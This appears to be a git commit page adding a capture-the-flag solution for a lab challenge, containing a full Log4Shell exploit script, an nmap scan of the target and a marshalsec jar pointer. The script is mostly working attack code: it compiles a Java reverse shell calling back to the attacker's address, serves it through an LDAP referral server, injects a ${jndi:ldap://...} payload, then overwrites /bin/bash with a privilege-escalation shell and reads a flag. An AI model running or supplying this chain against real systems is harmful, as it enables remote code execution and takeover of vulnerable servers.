Day 19 added
This commit is contained in:
parent
2bf71ada77
commit
d80372c8ff
1
Day 19/.gitattributes
vendored
Normal file
1
Day 19/.gitattributes
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text
|
173
Day 19/exploit.py
Normal file
173
Day 19/exploit.py
Normal file
@ -0,0 +1,173 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
|
||||||
|
# https://git.romanh.de/Roman/HackingScripts
|
||||||
|
|
||||||
|
import os
|
||||||
|
import io
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
import time
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import subprocess
|
||||||
|
import urllib.parse
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from hackingscripts import util, rev_shell
|
||||||
|
from hackingscripts.fileserver import HttpFileServer
|
||||||
|
from urllib3.exceptions import InsecureRequestWarning
|
||||||
|
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||||
|
|
||||||
|
import signal
|
||||||
|
import threading
|
||||||
|
|
||||||
|
IP_ADDRESS = util.get_address()
|
||||||
|
BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||||
|
PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
|
||||||
|
|
||||||
|
def request(method, uri, **kwargs):
|
||||||
|
if not uri.startswith("/") and uri != "":
|
||||||
|
uri = "/" + uri
|
||||||
|
|
||||||
|
client = requests
|
||||||
|
if "session" in kwargs:
|
||||||
|
client = kwargs["session"]
|
||||||
|
del kwargs["session"]
|
||||||
|
|
||||||
|
if "allow_redirects" not in kwargs:
|
||||||
|
kwargs["allow_redirects"] = False
|
||||||
|
|
||||||
|
if "verify" not in kwargs:
|
||||||
|
kwargs["verify"] = False
|
||||||
|
|
||||||
|
if "proxies" not in kwargs:
|
||||||
|
kwargs["proxies"] = PROXIES
|
||||||
|
|
||||||
|
url = BASE_URL + uri
|
||||||
|
return client.request(method, url, **kwargs)
|
||||||
|
|
||||||
|
def compile_java(shell_port):
|
||||||
|
java_code = f"""
|
||||||
|
import java.io.IOException;
|
||||||
|
import java.io.InputStream;
|
||||||
|
import java.io.OutputStream;
|
||||||
|
import java.net.Socket;
|
||||||
|
|
||||||
|
public class Exploit {{
|
||||||
|
|
||||||
|
public Exploit() throws Exception {{
|
||||||
|
String host = "{IP_ADDRESS}";
|
||||||
|
int port = {shell_port};
|
||||||
|
String cmd = "/bin/sh";
|
||||||
|
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
|
||||||
|
Socket s = new Socket(host,port);
|
||||||
|
InputStream pi=p.getInputStream(),
|
||||||
|
pe = p.getErrorStream(),
|
||||||
|
si = s.getInputStream();
|
||||||
|
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
|
||||||
|
while (!s.isClosed()) {{
|
||||||
|
while (pi.available() > 0)
|
||||||
|
so.write(pi.read());
|
||||||
|
while (pe.available() > 0)
|
||||||
|
so.write(pe.read());
|
||||||
|
while (si.available() > 0)
|
||||||
|
po.write(si.read());
|
||||||
|
so.flush();
|
||||||
|
po.flush();
|
||||||
|
Thread.sleep(50);
|
||||||
|
try {{
|
||||||
|
p.exitValue();
|
||||||
|
break;
|
||||||
|
}} catch (Exception e) {{
|
||||||
|
}}
|
||||||
|
}}
|
||||||
|
p.destroy();
|
||||||
|
s.close();
|
||||||
|
}}
|
||||||
|
}}
|
||||||
|
"""
|
||||||
|
|
||||||
|
with open("Exploit.java", "w") as f:
|
||||||
|
f.write(java_code)
|
||||||
|
|
||||||
|
subprocess.run(["javac", "Exploit.java"])
|
||||||
|
with open("Exploit.class", "rb") as f:
|
||||||
|
java_class = f.read()
|
||||||
|
|
||||||
|
os.remove("Exploit.java")
|
||||||
|
os.remove("Exploit.class")
|
||||||
|
return java_class
|
||||||
|
|
||||||
|
def send_message(msg):
|
||||||
|
json_data = { "name": "", "message": msg }
|
||||||
|
res = request("POST", "/up/sendmessage", json=json_data)
|
||||||
|
util.assert_status_code(res, 200)
|
||||||
|
|
||||||
|
def get_privesc_code():
|
||||||
|
c_code = b"""#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
int main() {
|
||||||
|
printf(\"Spawning a shell with -p parameter...\");
|
||||||
|
char *shell = \"/bin/sh\";
|
||||||
|
char *args[] = {shell, \"-p\", NULL};
|
||||||
|
execve(shell, args, NULL);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
"""
|
||||||
|
|
||||||
|
return base64.b64encode(c_code).decode()
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
|
||||||
|
http_Port = 8000
|
||||||
|
shell_port = 9001
|
||||||
|
java_payload = compile_java(shell_port)
|
||||||
|
file_server = HttpFileServer("0.0.0.0", http_Port)
|
||||||
|
file_server.addFile("Exploit.class", java_payload)
|
||||||
|
file_server.enableLogging()
|
||||||
|
file_server.startBackground()
|
||||||
|
|
||||||
|
payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}"
|
||||||
|
payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS)
|
||||||
|
ldap_process = None
|
||||||
|
|
||||||
|
def spawn_ldap_server():
|
||||||
|
global ldap_process
|
||||||
|
ldap_process = subprocess.Popen([
|
||||||
|
"java",
|
||||||
|
"-cp",
|
||||||
|
os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"),
|
||||||
|
"marshalsec.jndi.LDAPRefServer",
|
||||||
|
payload_url
|
||||||
|
])
|
||||||
|
ldap_process.wait()
|
||||||
|
|
||||||
|
print("[ ] Starting LDAP Server")
|
||||||
|
ldap_thread = threading.Thread(target=spawn_ldap_server)
|
||||||
|
ldap_thread.start()
|
||||||
|
|
||||||
|
print("[ ] Triggering log4j shell")
|
||||||
|
shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port)
|
||||||
|
shell.os = "unix"
|
||||||
|
print("[+] Got shell!")
|
||||||
|
|
||||||
|
privesc = get_privesc_code()
|
||||||
|
commands = [
|
||||||
|
f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash",
|
||||||
|
"/santas-workshop/tool",
|
||||||
|
"s",
|
||||||
|
"cat /home/santa/flag.txt",
|
||||||
|
"exit"
|
||||||
|
]
|
||||||
|
for cmd in commands:
|
||||||
|
shell.sendline(cmd)
|
||||||
|
time.sleep(0.5)
|
||||||
|
|
||||||
|
print("[+] Flag:", shell.raw_output.decode())
|
||||||
|
shell.close()
|
||||||
|
|
||||||
|
print("[ ] Stopping listeners...")
|
||||||
|
file_server.stop()
|
||||||
|
ldap_process.send_signal(signal.SIGINT)
|
||||||
|
ldap_thread.join()
|
51
Day 19/machine
Normal file
51
Day 19/machine
Normal file
@ -0,0 +1,51 @@
|
|||||||
|
Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land
|
||||||
|
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
22/tcp filtered ssh
|
||||||
|
80/tcp open http Jetty 9.4.26v20200117
|
||||||
|
|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/
|
||||||
|
111/tcp open rpcbind 2-4 (RPC #100000)
|
||||||
|
| rpcinfo:
|
||||||
|
| program version port/proto service
|
||||||
|
| 100000 2,3,4 111/tcp rpcbind
|
||||||
|
| 100000 2,3,4 111/udp rpcbind
|
||||||
|
| 100000 3,4 111/tcp6 rpcbind
|
||||||
|
|_ 100000 3,4 111/udp6 rpcbind
|
||||||
|
443/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|
||||||
|
| ssl-cert: Subject: commonName=*.idocker.vuln.land
|
||||||
|
| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land
|
||||||
|
| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
|
||||||
|
| Public Key type: rsa
|
||||||
|
| Public Key bits: 3072
|
||||||
|
| Signature Algorithm: sha256WithRSAEncryption
|
||||||
|
| Not valid before: 2023-09-04T00:00:00
|
||||||
|
| Not valid after: 2024-09-08T23:59:59
|
||||||
|
| MD5: 80d7:8bfe:9544:857d:d5ab:3419:4283:4228
|
||||||
|
|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73
|
||||||
|
| http-methods:
|
||||||
|
|_ Supported Methods: GET HEAD
|
||||||
|
|_http-server-header: Jetty(9.4.26.v20200117)
|
||||||
|
|_http-title: Minecraft Dynamic Map
|
||||||
|
| http-robots.txt: 5 disallowed entries
|
||||||
|
|_/tiles/ /js/ /standalone/ /images/ /css/
|
||||||
|
8080/tcp open http-proxy
|
||||||
|
| fingerprint-strings:
|
||||||
|
| FourOhFourRequest, GetRequest, HTTPOptions:
|
||||||
|
| HTTP/1.0 401 Unauthorized
|
||||||
|
| Content-Type: text/plain
|
||||||
|
| Www-Authenticate: Basic realm="traefik"
|
||||||
|
| Date: Mon, 18 Dec 2023 23:25:56 GMT
|
||||||
|
| Content-Length: 17
|
||||||
|
| Unauthorized
|
||||||
|
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie:
|
||||||
|
| HTTP/1.1 400 Bad Request
|
||||||
|
| Content-Type: text/plain; charset=utf-8
|
||||||
|
| Connection: close
|
||||||
|
|_ Request
|
||||||
|
|_http-title: Site doesn't have a title (text/plain).
|
||||||
|
| http-auth:
|
||||||
|
| HTTP/1.1 401 Unauthorized\x0D
|
||||||
|
|_ Basic realm=traefik
|
||||||
|
9100/tcp open jetdirect?
|
||||||
|
42810/tcp open fmproduct 1-4 (RPC #1073741824)
|
||||||
|
55555/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|
3
Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar
Normal file
3
Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
version https://git-lfs.github.com/spec/v1
|
||||||
|
oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7
|
||||||
|
size 42565306
|
Loading…
Reference in New Issue
Block a user